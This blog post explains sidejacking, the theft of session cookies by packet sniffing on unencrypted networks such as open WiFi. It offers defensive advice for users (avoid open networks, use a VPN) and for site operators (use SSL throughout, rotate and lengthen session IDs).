A few days back we saw what Cryptojacking is and how the hackers steal your CPU cycles without you knowing about it. Hacking has been constantly on the rise as internet penetration is growing. Hackers always expect to find someone not following security practice and to con him/her. Let’s learn about another old trick which hackers use to steal information from an unsecured network – known as Sidejacking.
What is sidejacking?
Sidejacking is a method of session hijacking in which the hacker steals a session cookie by reading network packets. There are packet sniffers available on the internet which could be used by the hacker to sniff the packets on the network. By reading these packets, a malicious person can get the session id and then can use it to access the same website. If you are a logged in user and if your session id is stolen by the hacker, he/she can effectively imposter as you and use the app or website as if it was you.
Many websites use SSL (Secure Socket Layer) to encrypt the data between client and server and in that case, it becomes very difficult for a hacker to break the encryption and then steal the cookie. However, many websites, use SSL only for authentication purpose or only for restricted areas of the website. So, if you are accessing any such website, and if a hacker sidejacks you after your authentication is done, he/she can still access the website as if it was you.
How to avoid sidejacking?
Packet sniffing is very easy when hacker and victim(s) are on the same network. This typically happens on open WiFi networks, where traffic between your device and the WiFi access point could be unencrypted and thus easy for the hacker(s) to sniff. Hence it is important to be careful while connecting with open WiFi connections – best to avoid it. You could also use VPN connection which encrypts the data end-to-end.
From the server side, development teams should use end-to-end SSL connection, change the session id after successful login and use relatively long session IDs to avoid guessing!
Security, Hacking, Firesheep, Cryptojacking, VPN, SSL, DroidSheep